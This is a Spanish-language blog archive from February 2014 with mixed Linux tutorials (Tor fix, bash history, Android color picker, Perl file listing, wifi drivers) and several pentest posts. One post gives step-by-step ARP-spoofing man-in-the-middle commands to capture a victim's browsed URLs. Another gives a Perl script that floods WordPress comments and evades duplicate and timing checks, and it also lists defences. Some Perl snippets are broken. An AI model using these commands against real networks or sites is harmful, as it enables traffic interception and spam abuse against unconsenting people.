martes, 18 de febrero de 2014

Torbrowser no detecta teclas en Ubuntu 13.10

Hace poco queria usar Tor browser,y no me detecto las teclas por un error de IBUS,este :

IBUS-WARNING **: Events queue growing too big, will start to drop.

Bueno lo que podemos hacer es un X11 forwarding,para ejecutar Tor,esto es muy sencillo:

Necesitamos tener instalado opensshserver:

sudo apt-get install openssh-server
Ahora en la carpeta donde esta el script que inicia tor(start-tor-browser):

ssh -X localhost $PWD/start-tor-browser

Así de sencillo:


Tal vez con una actualización ya no ocurra este error.

Y recuerda si te sirvió y tienes cuenta de google dale google aya abajo

Leer más...

viernes, 14 de febrero de 2014

[Kali Linux] Efectuar MitM para ver urls

Como estoy haciendo una serie de tutoriales de pentest,no tanto en si pentest si no hasta ahora uno de spam otro de  information gathering otro de otra cosa,pero bueno se entiende el propósito,para que se entienda mejor y sea mas sencillo estas practicas recomiendo usar Kali Linux,puede ser Blackbuntu,BlackArch u otra distribución de Linux enfocada a la seguridad informatica. Yo en lo personal me gusta Kali pero en cualquier sistema Linux se pueden instalar los programas que aquí he mencionado y voy a mencionar aunque sea compilando,así que si no tienen las herramientas en su sistema y no tienen Kali Linux pueden buscar como instalar dicha herramienta en su sistema,sea Ubuntu,Arch,openSUSE,Gentoo,Fedora,etc.

Disclamer

Este tutorial es con fines de obtener conocimiento sobre el tema a nivel basico,la ejecución del mismo esta bajo el criterio del leector.

Bien,este tutorial lo pueden efectuar incluso sobre su localhost asi que no hay mucho problema si no tienen una segunda maquina donde hacer las pruebas.

Primero que nada que es MitM:

En criptografía, un ataque man-in-the-middle o JANUS (MitM o intermediario, en español) es un ataque en el que el enemigo adquiere la capacidad de leer, insertar y modificar a voluntad, los mensajes entre dos partes sin que ninguna de ellas conozca que el enlace entre ellos ha sido violado. El atacante debe ser capaz de observar e interceptar mensajes entre las dos víctimas. El ataque MitM es particularmente significativo en el protocolo original de intercambio de claves de Diffie-Hellman, cuando éste se emplea sin autenticación.

Ataques:

El ataque MitM puede incluir algunos de los siguientes subataques:

  • Intercepción de la comunicación (eavesdropping), incluyendo análisis del tráfico y posiblemente un ataque a partir de textos planos (plaintext) conocidos.
  • Ataques a partir de textos cifrados escogidos, en función de lo que el receptor haga con el mensaje descifrado.
  • Ataques de sustitución.
  • Ataques de repetición.
  • Ataque por denegación de servicio (denial of service). El atacante podría, por ejemplo, bloquear las comunicaciones antes de atacar una de las partes. La defensa en ese caso pasa por el envío periódico de mensajes de status autenticados.

Fuente : es.wikipedia.org

Lo que nosotros vamos a realizar en este tutorial es un eavesdropping pero solo el analisis de trafico a nivel "humano" ya que podemos ver los datos en hex,pero aquí veremos las url directas.

Tutorial


Un nivel  Script Kiddies(automatizando con herramientas existentes),es el siguiente:

Usando websploit

Websploit nos probe una shell como la de Metasploit,como la que hice para ver los exif de una imagen.

Al ejecutar el programa:

websploit
Podemos ver la ayuda con help,al igual que metasploit cuenta con diferentes modulos,nosotros usaremos una para MitM:

use network/mitm

Vemos las opciones:

show options

Como vemos tenemos algunas opcines,vamos a setearlas:

set interface interfaz

set router gateway

set target ip_victima

set sniffer urlsnarf

En interfaz es la interfaz de nuestra red,si estamos por cable ethx,si estamos por wirless,wlanx.

En router ponemos la puerta enlace,para verla desde consola:

netstat -nr

En target ponemos la ip victima,podemos obtenerla haciendo un scan rango 24 con nmap al gateway:

nmap -sP gateway/24

o podemos poner nuestra propia ip dinamica,para no molestar a alquien mas y hacer pruebas.

En sniffer ponemos urlsnarf,este programa nos mostrara las url que esta viendo la ip que asignamos en target.


Ahora solo ejecutamos con:

run


Bien,con eso hacemos todos,cuendo comience a navegar el target nos mostrara las urls.


Ahora un nivel mas bajo,teclear todo nosotros mismos para ver por lo menos como se hace esto:

Primero que nada hacemos ip forward,en linux es tan facil como setear a uno la configuracion del archivo correspondiente:

echo 1 > /proc/sys/net/ipv4/ip_forward

Ahora tenemos que redirigir el trafico del puerto 80 basado en reglas de iptables,por ejemplo al puerto 8080:

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

Con eso esta listo el enrutamiento.

Ahora vamos a ver lo necesario,gateway y target:

Gateway:

route | sed -n "3p"

Targets:

nmap -sP gateway/24 | grep --color for

Con eso tenemos la informacion necesaria.

Ahora solo falta la suplantacion de ARP:

arpspoof -i interfaz -t gateway ip_victima

Lo podemos hacer dual para no errar.

Ahora solo ejecutamos urlsnarf,para analizar las urls luego lo redirigiremos con un estándar de unix:

urlsnarf -i interfaz  >> captura



 Para ver el resultado podemos hacerlo con cat,less,more:

cat captura
O podemos sacar las urls directamente con,una regex,por ejemplo con perl en una tuberia Unix:





cat captura  | perl  -lane 'while ($_ =~ m/\"(.+)\"/ig){ print $1."\n"}' | grep --color http://
Eso es todo.

Y recuerda si te sirvió y tienes cuenta de google dale google aya abajo

Leer más...

jueves, 13 de febrero de 2014

Analizar sitios web con Linux parte 2

Seguimos con los tutoriales de pentest,estos tutoriales son de analisis o recopilación de información ya que incluso las herramientas(por lo menos la primera),se considera inofensiva.

Pero aun así nos puede dar mucha información sobre un sitio web,asi que comencemos.

Dig

La primera herramienta es dig, esta herramienta es para analisis de dns.

Una explicación sencilla sobre los dns:

Cuando entramos a un sitio web desde el navegador colocamos una url en la barra de direcciones,esta dirección es resuelta por los dns para conectarnos a dicha pagina,estos dns no son a nivel usuario ya que lo único que vemos es como nos responde el navegador.

Dig nos sirve para ver todo lo que pasa por "debajo" de una simple url,ya sea para recopilar información para una analisis o para arreglar un error si somos los propietarios de ese sitio.

Bien los registros de dns son:

A = Address (Dirección ip)

AAAA = Adress (Direccion ipv6)

NS = Name Server – (Servidor de Nombres)

MX = Mail Exchange  (Registro de Intercambio de Correo) 

SOA = Start of authority (Autoridad de la zona) 

TXT = TeXT ( Información textual)

CNAME = Canonical Name (Nombre Canónico)

PTR = Pointer(Registro inverso)

Existen mas pero veremos esos con dig,para usar dig se usa la siguiente sintaxis:

dig itimetux.com

Donde itimetux.com es la url del sitio a "analizar" por defecto solo nos muestra la ip(A),este es el dominio si queremos la información de www usamos www.sitio.algo para ver el CNAME.

dig www.itimetux.com


También tenemos mas opciones:

Las cuales son para un filtrado especial,con los registros de dns de arriba,por ejemplo vamos a usar google.com para ejemplo,ya que itimetux no tiene algunas de estas características como ipv6,vamos a ver los NS de google:
dig NS google.com

Al igual que NS podemos usar MX,AAAA,etc.


Bien, también tenemos unos parámetros que podemos usar,como por ejemplo -x,para usar reverse dns:

Por ejemplo:

dig -x 216.239.32.10
Nos muestra el PTR del NS de google.

Por defecto estas consultas las hace usando el nameserver de nuestro resolv.conf,por defecto 127.0.1.1(si no lo han cambiado),para usar otro nameserver,por ejemplo uno publico:

Enlace
Por ejemplo el de OpenDNS u otro usamos un arroba:

dig itimetux.com @208.67.222.222
Si no muestra el mismo resultado que con nuestro nameserver normal podríamos estar bajo un ataque al dns,cache poisoning.

Mas información sobre dig:

dig -h | more

TheHarvester




Esta herramienta si es mas de analisis o mejor dicho de information gathering,que seria lo mismo,esta herramienta usando google,bing y otros motores de búsqueda ademas de SHODAN hace information gathering.

Esto nos recopila,subdominios,host virtuales,emails y otras cosas que tienen que ver con el sitio que usemos:

La sintaxis mas común,o la que yo uso es:

python theHarvester.py -d sitio.algo -e dns -l numero_maximo -b buscador

 Si lo usamos en Tiempo de Tux no mostrara gran información ya que es un blog(de blogger),pero en un blog por lo menos de wordpress si nos muestra mas información,por ejemplo vamos a usar desdelinux.net:

python theHarvester.py -d desdelinux.net -e 208.67.222.222 -l 200 -b all


Mas información:

python theHarvester.py -h

Eso es todo.



Leer más...

sábado, 8 de febrero de 2014

[Shell] Guardar mas comandos en history Linux

Muchas veces vemos en el historial comandos que hemos tecleado,muchas veces ni los recordamos y es por eso que los tecleamos,por ejemplo que hayamos usando un estándar de unix,un pipe o un comando que es difícil volver a escribir o simplemente no recordamos como era.

En Ubuntu por defecto el historial de history es de 2000 comandos,yo lo tengo en 20000,ya que uso mucho,pero mucho la terminal,así que si la usan igual o quieren registrar lo que escriben (puede que 1000,2000 quede corto) aquí veremos como:

Tutorial

Bien esto es bien sencillo,lo único que tenemos que hacer es cambiar dos variables de entorno,o una si así lo deseamos,las cuales son:

HISTSIZE # Numero de lineas que se muestran cuando tecleamos history

HISTFILESIZE # Numero de lineas que se guardan en el archivo

HISTFILE # Archivo donde esta el historial

Bien las que nos interesan son las dos primeras,mas especifico la segunda,ya que la primera es cuando tecleamos history,vean yo lo tengo en 20:


Para cambiar estas variables lo podemos hacer de varias formas,pero primero hay que localizar nuestro .bashrc :

Esta en nuestro home,a menos que hayamos cambiado esto:

Lo editamos:

nano ~/.bashrc

Lo buscamos :


Si no existen las variables las crean,si existen las actualizan, salimos:

Ctrl+x

Y reiniciamos la shell;

reset

Si queremos hacerlo con un editor de flujo y ahorrarnos el trabajo de entrar podemos usar sed:

sed -i -e 's/HISTSIZE.*/HISTSIZE=200/' ~/.bashrc

sed -i -e 's/HISTFILESIZE.*/HISTFILESIZE=20000/' ~/.bashrc

Si ven esto un poco peligroso,porque tecleamos cosas que no queremos que vea cualquiera,solo añaden un espacio al principio y no se guarda el comando.



Eso es todo.

Leer más...

jueves, 6 de febrero de 2014

Usar un selector de color en las preferencias Android (picker)

No hago tutoriales de Android .Últimamente ando de android developer ademas de iOS developer así que no se si haga mas tutoriales pero bueno:

Tutorial

Esto es usando eclipse.

Bien vamos a crear una aplicación normal:





Ahora en el Main vamos a hacer que cuando presionemos la opción de settings abra una activity de preferencias:





Vamos a crear una clase que cree la activity de preferencias:



Antes de crear el xml que sea el cuerpo de las preferencias tenemos que añadir el soporte del picker.

Nosotros vamos a usar ColorPickerPreference,hay mas o nosotros podemos crear el nuestro,pero si hay una librería hay que usarla:

Bajamos el proyecto:

https://github.com/attenzione/android-ColorPickerPreference
Descargamos el zip y lo descomprimimos.

Ahora en eclipse:

Le damos clic al sidebar de la izquierda y Import:

Existing Android Code...



 Ahora le damos clic derecho al proyecto y propiedades:

 Damos en Android y en Library le damos add y elegimos la librería (Test):



Ahora si creamos el xml de la librería:

En la carpeta res le damos new Folder y le ponemos de nombre xml.

Luego creamos un Android XML file en la carpeta xml.

En Resource Type elegimos Preference.

En file escribimos prefs:


Escribimos adentro del archivo:




Eso es todo solo falta añadir la pantalla de preferencias al manifiest:



vamos a usar el picker para cambiar el color de la letra del hola mundo que se crea automáticamente,para que se vea un ejemplo mas funcional:

Primero en layout añadimos un id al textview,por ejemplo hello:



Despues en el codigo añadimos ciertas cosas:

1. Una referencia al textview para manejar el color:

2. Un PreferenceManager,para obtener el color seleccionado.

3. Un manejo de vida para manejar (onResume),para cuando cerremos la actividad de preferencias cambie el color:

Eso se ve asi:



Y en interfaz se ve asi:





Eso es todo.



Y recuerda si te sirvió y tienes cuenta de google dale google aya abajo

Leer más...

miércoles, 5 de febrero de 2014

Como listar archivos con filtrado en Perl

En esta ocasion vamos a aprender como listar los archivos de un directorio con filtrado de extension,por ejemplo listar los .txt,los .png,etc.

En perl las cosas se pueden hacer de muchas maneras,así que vamos a ver algunas(no todas),pero las que me gustan o conozco:

En todos los ejemplos,el array @archivos contendrá los archivos filtrados,este sera el que pueden usar para lo que necesiten.


1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
use feature 'switch'; # Usamos switch

my $dir = "."; # . hace referencia al directorio actual

my @archivos;

 opendir(my $recorrer, $dir) || die "Error :( $! \n";  # recorrer es el filehandle
    while(readdir $recorrer){  # Leemos el directorio
        if (-f $dir . "/" . $_) { # Vemos si es un fichero
            given ($_) { 
                when (/.*jpg/) { # Elegimos la extension
                     push (@archivos, $_); # Añadimos al array el archivo
                }
                when (/.*jpeg/) { # Elegimos otra(si queremos)
                    push (@archivos, $_);
                }
            }
        } 
    }
    closedir $recorrer;  # Cerramos el directorio

Bien ese es que yo uso mas,es un poco a lo Java,pero me gusta que se vea mucho codigo,aunque luego me dicen que mientra menos mejor,y en perl eso es muy simple.

Bien ahora una forma mas sencilla,usando glob al estilo python,glob es similar a los pipes de Unix:

my @arr = glob("*.jpg");

Así de sencillo,aquí el problema es para añadir mas,podemos hacer esto si quisieramos tambien los .jpeg.


1
2
3
4
foreach (glob("*.jpeg")) 
{
   push (@archivos, $_);
}

Bien,ahora una manera aun mas sencilla:

my @arr = <*.jpg>;
De igual manera si queremos añadir mas:


1
2
3
4
foreach (<*.jpeg>)) 
{
   push (@archivos, $_);
}

Si queremos usar un directorio en especifico lo especificamos antes:

my @archivos = ;

Ahora por ejemplo para mostrar en pantalla:


1
2
3
4
5
6
7
use feature 'say';

my @archivos = <*.pl>;

foreach (@archivos) {    
    say $_;
}


Eso es todo.
Leer más...

lunes, 3 de febrero de 2014

[Shell] Spam comentarios wordpress

Seguimos hablando de pentest y aquí otra cosa que se ve mucho y que molesta,el spam,el spam son esos comentarios que no dejan nada y que son masivos.

A mi no me ha tocado mucho spam en blogger como dicen que sucede en wordpress,me han llovido anuncios,mentadas de madre,y otras ridiculeces pero bueno,es lo que pasa en la web hay todo tipo de gente hay muchas personas que comentan aportan y hay otras que,que bueno...

Pero bueno lo que sea de cada quien no se que sistema usen pero hace un tiempo pasaron mi capcha y comentaron 40 veces seguidas al mismo tiempo :O,hay que reconocer que saben lo que hacen.

En esta ocasión vamos a aprender a crear un spamer para los  comentarios de wordpress.

Esto no es para que anden spameando ya que es una tontería mas si el webmaster del sitio tiene las ip's(o simplemente wordpress nos manda la ip del comentario),es para que vean como se podría spamear y como defenderse,si quieren spamear haganlo bajo su propio riesgo yo solo les aviso de la hulla de Internet.

Bien vamos a usar Perl para este ejercicio,primero que nada instalamos lo necesario:

Abrimos una shell:
sudo cpan WWW::Mechanize
sudo cpan WWW::Mechanize::GZip
sudo cpan Data::Dumper
Bien ahora debemos por ejemplo:

Ver los imput del sitio en donde queremos "comentar",para esto podriamos usar regex y pipes Unix,pero vamos a hacerlo desde perl:

Aqui un sencillo script que ubica todos los input:

1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
use strict;
use WWW::Mechanize;
use HTML::Form;
use LWP::UserAgent;
use Data::Dumper;

my $url = "http://url";

my $mech = WWW::Mechanize->new(autocheck => 1);

$mech->get( $url ) or die("No es posible conectarse a $url");

my $ua = LWP::UserAgent->new;

my $response = $ua->($url);

my @forms = HTML::Form->parse($response);

foreach (@forms) {
    print Dumper($_);
}

Ejecutamos y vemos todos los input,en wordpress es una tontería esto ya que están a fuego:


Ahora tenemos los fields:

comment
email
author 
url 



Bien vamos a crear un script para un comentario simple:






1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
#!/usr/bin/env perl

use warnings;
use strict;
use WWW::Mechanize::GZip;

my $url = "http://url";

my $mech = WWW::Mechanize::GZip->new();

$mech->agent_alias("Linux Mozilla");

$mech->get($url) || die $!;

my $respuesta = $mech->submit_form(
       fields => {
       comment => "Este es un spam",
       email => 'email@gmail.com',
       author => "unknow",
       url => "direccion.com",
    }
);
print "Listo";
}

Con eso podemos comentar de manera común,ahora que convierte un comentario en spam:

El numero de envíos,así que vamos a enviar mas comentarios con un bucle:

Pero primer problema,wordpress verifica los comentarios en su base de datos,si son iguales redirigue la pagina y ya podríamos comentar.

Solución añadir un contador al comentario,con añadir un numero al principio o al final basta,esto en el mail o en el comentario.

'email@gmail.com'.$i

Otro problema,wordpress checa el tiempo en el que enviamos los mensajes,esto se solucion esperando un tiempo por ejemplo:

sleep 10;

Esperar 10 segundos en cada envió,si somos un poco ingeniosos incluso podemos usar una ip diferente para cada comentario,pero eso se los dejo de tarea.

1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
#!/usr/bin/env perl

use warnings;
use strict;
use WWW::Mechanize::GZip;

my $url = "http://url";

my $mech = WWW::Mechanize::GZip->new();

$mech->agent_alias("Linux Mozilla");

$mech->get($url) || die $!;

for (1..10) {
my $respuesta = $mech->submit_form(
       fields => {
       comment => "Este es un spam".$_,
       email => 'mail'.$_.'@gmail.com',
       author => "unknow".$_,
       url => "direccion.com",
    }
);
print $respuesta->content(); # Nos muestra la respuesta del sitio.
sleep 10;
}

De esa manera podríamos spamear un sitio con comentarios,de igual forma lo podemos hacer en formularios de contacto,pero bueno.



Ahora como defenderse de esto:

1. Wordpress automáticamente no publica estos comentarios,pero de por si ya tenerlos en la bandeja es molesto así que si los publica automáticamente deben cambiar a moderar.

2. Si tienen los registros del servidor se podría hacer un filtrado de ip basado en tiempo esto lo hace wordpress automáticamente,pero no esta de mas usarlo a nivel de servidor,solo que si se usa una ip diferente podría evadirse este sistema.

3. Dejárselo a los profesionales hay filtros contra el spam(si tenemos wordpress en nuestro host),hay plugins para evitar esto,los instalamos y listo.

Pero cuidado ya que aqui esta la trampa:

Metemos un plugin pensando que nos soluciona esto,pero ese es el anzuelo de los spamers,por ejemplo Akismet,en una version(no se si ahora),mostraba nuestro full path disclosure(lo veremos en su momento) que seria un problema mas grande y que se abria logrado gracias al spam.

Bien eso es todo :D.

Un comunicado de este sitio:

Ya no voy a dejar comentar a personas anonimas,solo a las de google y personas registradas,son los que dejan mejores comentarios y si me mientan la madre(como lo han hecho últimamente) por lo menos den la cara y cuerpo,o mejor dicho el nick y el avatar :P.

Es enserio ya tengo bastante con la delincuencia de este país, uno no se siente seguro en la calle como para que en el sitio donde me distraigo un rato también fomenten la violencia,así que si quieren comentar háganlo con su cuenta,también serán moderados los comentarios.

Leer más...

domingo, 2 de febrero de 2014

Cambiar eth1 por wlan Ubuntu 13.10 BCM4313

En esta ocasión cambiaremos la interfaz eth1 por wlan0,eth1 la provee el modulo wl del fabricante(privativo) y no provee algunas capacidades de la interfaz wlan0 del modulo brcmsmac.

Bien es sencillo y funciona con los BCM4313 y otros:

Primero abrimos una terminal (Ctrl+Alt+T):

Desinstalamos el modulo wl:

sudo modprobe -r wl

sudo apt-get purge bcmwl-kernel-source

Ahora probamos el modulo brcmsmac:

sudo modprobe -v brcmsmac

No va a cargar el modulo es solo para ver si no da error,ya que este viene en junto con el kernel,si da un error les recomiendo instalar el kernel 3.13:

Aquí dicen como : Enlace

Bien si no dio error ahora solo cargamos el modulo al arrancar el sistema:

su
echo "brcmsmac" >> /etc/modules
exit
Ahora reinician el sistema y listo :D

Leer más...

sábado, 1 de febrero de 2014

Analizar sitios web con Linux parte 1

Comenzamos con los tutoriales de pentest,en este sitio nunca he hablado de estas practicas y no lo hare mucho,pero ya no se me ocurre de que escribir :P,no no es cierto tenemos los tutoriales de Java,PythonGtk,Lua,Shell,Sqlite shell,pero bueno voy a meterme un poco en esto y iremos aumentando la "dificultad" con el tiempo.

Bien vamos a comenzar con lo sencillo lo que ya esta creado,en esta ocasión vamos a hablar de escaneres web no simplemente escaneres como tal ya que esto desarrolla muchas ramas de lo mismo,desde un simple ping para ver si el sitio esta online hasta WebCrawlers,como dije vamos a comenzar con lo sencillo, recolección de información desde analisis .

Bien vamos a comenzar por lo sencillo ya que hay algunos servicios que personas desconocen como por ejemplo whois:

Whois:

WHOIS es un protocolo TCP basado en petición/respuesta que se utiliza para efectuar consultas en una base de datos que permite determinar el propietario de un nombre de dominio o una dirección IP en Internet.

Mas finformacion : Wikipedia

Para usar whois es tan simple como abrir una terminal:

En Ubuntu(Ctrl+Alt+T) y teclear:

whois sitio

Por ejemplo

whois itimetux.com
Tenemos varias opciones por ejemplo:

--verbose # Para que se vea mejor
-p # Conectarnos a un puerto
-h # Lo normal,conectarnos a un host
-H # Esconder avisos legales

Entre otras cosas,mas info:

whois --help
Como todo esto se hace desde la shell podemos hacer filtrado,por ejemplo podemos ver información del Admin:

whois wikipedia.org | grep Admin



Whatweb:

Ahora vamos a usar whatweb,whatweb es un escaner de nueva generacion muy pero muy potente que muestra desde el nombre de la pagina hasta el nombre del servidor,la ip,el cms.

Para usar :

whatweb url

Por ejemplo:

whatweb --verbose itimetux.com

Tenemos algunas opciones:

--proxy # Para usar proxy

--max-redirects=num # Numero maximo de redirecciones ya que hay paginas que redirigen,por defecto es 10

-U=AGENT # Cambiar el agente con el que "visitamos" la pagina

Mas info:

whatweb --help



Nmap:

Nmap es un programa de código abierto que sirve para efectuar rastreo de puertos escrito originalmente por Gordon Lyon (más conocido por su alias Fyodor Vaskovich). Se usa para evaluar la seguridad de sistemas informáticos, así como para descubrir servicios o servidores en una red informática.

Mas informacion : Wikipedia

Nmap tiene opciones como:

 -A # Detectar el sistema operativo

-v # Para que se vea mejor

--spoof-mac # Suplantar la MAC

 -p  # Especificar puerto
Mas info:

nmap --help
La que mas nos interesa es -sV que es para detectar los puertos abiertos del sitio,la sintaxis es:

nmap -sV sitio-o-ip
Por ejemplo:

nmap -sP itimetux.com

Si queremos ver mediante la ip,usamos whatweb para obtenerla:


 whatweb itimetux.com --verbose  2> /dev/null | grep 

Como ven hasta tengo disponible https :P,pero algunos sitios tienen hasta ssh,etc.


Eso es todo por esta entrada,no explique muy bien pero así serán estas entradas,investiguen un poco mas sobre las tres herramientas.




Leer más...